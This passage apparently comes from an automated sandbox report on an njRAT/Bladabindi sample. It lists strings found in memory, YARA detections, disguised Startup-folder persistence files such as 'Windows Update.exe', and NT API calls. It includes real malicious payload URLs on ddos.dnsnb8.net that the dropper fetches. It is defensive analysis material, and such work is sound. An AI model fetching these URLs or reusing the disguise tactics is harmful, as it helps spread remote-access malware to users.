          Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar#O
          Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar1
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarH
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarM
          Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarPO
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar_
          Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarc
          Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rard
          Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rareM
          Source: RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn
          Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarzO
          Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2245675608.0000000000C2A000.00000004.00000010.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
          Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar5
          Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar86)
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarE
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarM
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarR
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarZ
          Source: RRqyIX.exe, 00000001.00000002.2244767719.000000000063E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp6
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rara
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarx
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar$
          Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
          Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.drString found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
          Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.drString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
          Source: LisectAVT_2403002B_366.exe, Explower.exe6.4.dr, system.exe.4.dr, Notepad.exe.4.dr, Explower.exe0.4.dr, Explower.exe8.4.dr, Explower.exe.4.dr, Explower.exe2.4.dr, Explower.exe3.4.dr, Explower.exe4.4.dr, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr, server.exe.0.dr, Explower.exe7.4.dr, Microsoft Corporation.exe.4.dr, Explower.exe5.4.dr, Explower.exe1.4.drString found in binary or memory: http://pki-ocsp.symauth.com0
          Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
          Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
          Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
          Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
          Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
          Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
          Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
          Source: Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.enigmaprotector.com/
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A4B000.00000040.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
          Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
          Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
          Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
          Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
          Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
          Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
          Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
          Source: RRqyIX.exe, 00000001.00000002.2244767719.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000003.2166657985.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
          Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
          Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\server.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exeWindow created: window name: CLIPBRDWNDCLASS
          Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_2cc260de-a

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002B_366.exe PID: 6620, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: server.exe PID: 6864, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe PID: 4068, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Microsoft Corporation.exe PID: 1924, type: MEMORYSTR

          System Summary

          barindex
          Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
          Source: RRqyIX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: LisectAVT_2403002B_366.exeStatic PE information: section name:
          Source: LisectAVT_2403002B_366.exeStatic PE information: section name:
          Source: LisectAVT_2403002B_366.exeStatic PE information: section name:
          Source: server.exe.0.drStatic PE information: section name:
          Source: server.exe.0.drStatic PE information: section name:
          Source: server.exe.0.drStatic PE information: section name:
          Source: Explower.exe.4.drStatic PE information: section name:
          Source: Explower.exe.4.drStatic PE information: section name:
          Source: Explower.exe.4.drStatic PE information: section name:
          Source: Microsoft Corporation.exe.4.drStatic PE information: section name:
          Source: Microsoft Corporation.exe.4.drStatic PE information: section name:
          Source: Microsoft Corporation.exe.4.drStatic PE information: section name:
          Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.drStatic PE information: section name:
          Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.drStatic PE information: section name:
          Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.drStatic PE information: section name:
          Source: Explower.exe0.4.drStatic PE information: section name:
          Source: Explower.exe0.4.drStatic PE information: section name:
          Source: Explower.exe0.4.drStatic PE information: section name:
          Source: Explower.exe1.4.drStatic PE information: section name:
          Source: Explower.exe1.4.drStatic PE information: section name:
          Source: Explower.exe1.4.drStatic PE information: section name:
          Source: Explower.exe2.4.drStatic PE information: section name:
          Source: Explower.exe2.4.drStatic PE information: section name:
          Source: Explower.exe2.4.drStatic PE information: section name:
          Source: Explower.exe3.4.drStatic PE information: section name:
          Source: Explower.exe3.4.drStatic PE information: section name:
          Source: Explower.exe3.4.drStatic PE information: section name:
          Source: Explower.exe4.4.drStatic PE information: section name:
          Source: Explower.exe4.4.drStatic PE information: section name:
          Source: Explower.exe4.4.drStatic PE information: section name:
          Source: Explower.exe5.4.drStatic PE information: section name:
          Source: Explower.exe5.4.drStatic PE information: section name:
          Source: Explower.exe5.4.drStatic PE information: section name:
          Source: Explower.exe6.4.drStatic PE information: section name:
          Source: Explower.exe6.4.drStatic PE information: section name:
          Source: Explower.exe6.4.drStatic PE information: section name:
          Source: Explower.exe7.4.drStatic PE information: section name:
          Source: Explower.exe7.4.drStatic PE information: section name:
          Source: Explower.exe7.4.drStatic PE information: section name:
          Source: Explower.exe8.4.drStatic PE information: section name:
          Source: Explower.exe8.4.drStatic PE information: section name:
          Source: Explower.exe8.4.drStatic PE information: section name:
          Source: system.exe.4.drStatic PE information: section name:
          Source: system.exe.4.drStatic PE information: section name:
          Source: system.exe.4.drStatic PE information: section name:
          Source: Notepad.exe.4.drStatic PE information: section name:
          Source: Notepad.exe.4.drStatic PE information: section name:
          Source: Notepad.exe.4.drStatic PE information: section name:
          Source: C:\Users\user\AppData\Local\Temp\server.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A199DC NtReadFile,4_2_00A199DC
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A1996A NtClose,4_2_00A1996A
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19974 NtSetInformationFile,4_2_00A19974
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19A34 NtCreateFile,4_2_00A19A34
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19B14 NtProtectVirtualMemory,4_2_00A19B14
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A190A2 NtQuerySecurityObject,4_2_00A190A2
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19098 NtSetSecurityObject,4_2_00A19098
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A190D8 NtNotifyChangeDirectoryFile,4_2_00A190D8
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19024 NtOpenKeyEx,4_2_00A19024
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19050 NtSetVolumeInformationFile,4_2_00A19050
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A191A3 NtFlushBuffersFile,4_2_00A191A3
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A191BF NtExtendSection,4_2_00A191BF
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A191C8 NtAccessCheck,4_2_00A191C8
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19130 NtFsControlFile,4_2_00A19130
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A192AC NtQueryValueKey,4_2_00A192AC
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A192EC NtCreateKey,4_2_00A192EC
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A1922C NtOpenKey,4_2_00A1922C
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19236 NtEnumerateValueKey,4_2_00A19236
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19278 NtQueryKey,4_2_00A19278
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A193FE NtFlushKey,4_2_00A193FE
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A193C6 NtDeleteKey,4_2_00A193C6
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A193CE NtDeleteValueKey,4_2_00A193CE
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19334 NtEnumerateKey,4_2_00A19334
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19374 NtSetValueKey,4_2_00A19374
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A194A4 NtQueryMultipleValueKey,4_2_00A194A4
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A194F8 NtReplaceKey,4_2_00A194F8
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19438 NtLoadKey2,4_2_00A19438
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19406 NtLoadKey,4_2_00A19406
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19442 NtNotifyChangeKey,4_2_00A19442
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A195A4 NtWriteFile,4_2_00A195A4
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19586 NtTerminateProcess,4_2_00A19586
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A195FC NtQueryObject,4_2_00A195FC
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19522 NtSaveKey,4_2_00A19522
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19502 NtRestoreKey,4_2_00A19502
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A1957E NtUnloadKey,4_2_00A1957E
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19540 NtSetInformationKey,4_2_00A19540
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19698 NtQueryDirectoryFileEx,4_2_00A19698
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19630 NtQueryDirectoryFile,4_2_00A19630
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A197A6 NtDeleteFile,4_2_00A197A6
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A197AE NtLockFile,4_2_00A197AE
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A1970C NtOpenSection,4_2_00A1970C
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19716 NtDuplicateObject,4_2_00A19716
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19760 NtQueryVolumeInformationFile,4_2_00A19760
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A198B0 NtMapViewOfSection,4_2_00A198B0
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19810 NtUnlockFile,4_2_00A19810
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19873 NtUnmapViewOfSection,4_2_00A19873
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A1987C NtQuerySection,4_2_00A1987C
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19857 NtQueryFullAttributesFile,4_2_00A19857
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A199A8 NtQueryInformationFile,4_2_00A199A8
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19910 NtCreateSection,4_2_00A19910
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19958 NtClose,4_2_00A19958
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19A9C NtOpenFile,4_2_00A19A9C
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A19AEF NtQueryAttributesFile,4_2_00A19AEF
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A18EA8 NtCreateThread,4_2_00A18EA8
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A18FBC NtCreateUserProcess,4_2_00A18FBC
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A18F0B NtResumeThread,4_2_00A18F0B
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A18F14 NtCreateProcess,4_2_00A18F14
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00A18F64 NtCreateProcessEx,4_2_00A18F64
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00D9BEC6 NtQuerySystemInformation,4_2_00D9BEC6
          Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 4_2_00D9BE8B NtQuerySystemInformation,4_2_00D9BE8B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A299DC NtReadFile,14_2_00A299DC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A2996A NtClose,14_2_00A2996A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29974 NtSetInformationFile,14_2_00A29974
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29A34 NtCreateFile,14_2_00A29A34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29B14 NtProtectVirtualMemory,14_2_00A29B14
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A290A2 NtQuerySecurityObject,14_2_00A290A2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A298B0 NtMapViewOfSection,14_2_00A298B0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29098 NtSetSecurityObject,14_2_00A29098
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A290D8 NtNotifyChangeDirectoryFile,14_2_00A290D8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29024 NtOpenKeyEx,14_2_00A29024
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29810 NtUnlockFile,14_2_00A29810
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29873 NtUnmapViewOfSection,14_2_00A29873
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A2987C NtQuerySection,14_2_00A2987C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29050 NtSetVolumeInformationFile,14_2_00A29050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29857 NtQueryFullAttributesFile,14_2_00A29857
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A291A3 NtFlushBuffersFile,14_2_00A291A3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A299A8 NtQueryInformationFile,14_2_00A299A8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A291BF NtExtendSection,14_2_00A291BF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A291C8 NtAccessCheck,14_2_00A291C8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29130 NtFsControlFile,14_2_00A29130
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29910 NtCreateSection,14_2_00A29910
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29958 NtClose,14_2_00A29958
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A292AC NtQueryValueKey,14_2_00A292AC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29A9C NtOpenFile,14_2_00A29A9C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29AEF NtQueryAttributesFile,14_2_00A29AEF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A292EC NtCreateKey,14_2_00A292EC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A2922C NtOpenKey,14_2_00A2922C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29236 NtEnumerateValueKey,14_2_00A29236
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29278 NtQueryKey,14_2_00A29278
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A293FE NtFlushKey,14_2_00A293FE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A293C6 NtDeleteKey,14_2_00A293C6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A293CE NtDeleteValueKey,14_2_00A293CE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29334 NtEnumerateKey,14_2_00A29334
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29374 NtSetValueKey,14_2_00A29374
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A294A4 NtQueryMultipleValueKey,14_2_00A294A4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A294F8 NtReplaceKey,14_2_00A294F8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exeCode function: 14_2_00A29438 NtLoadKey2,14_2_00A29438
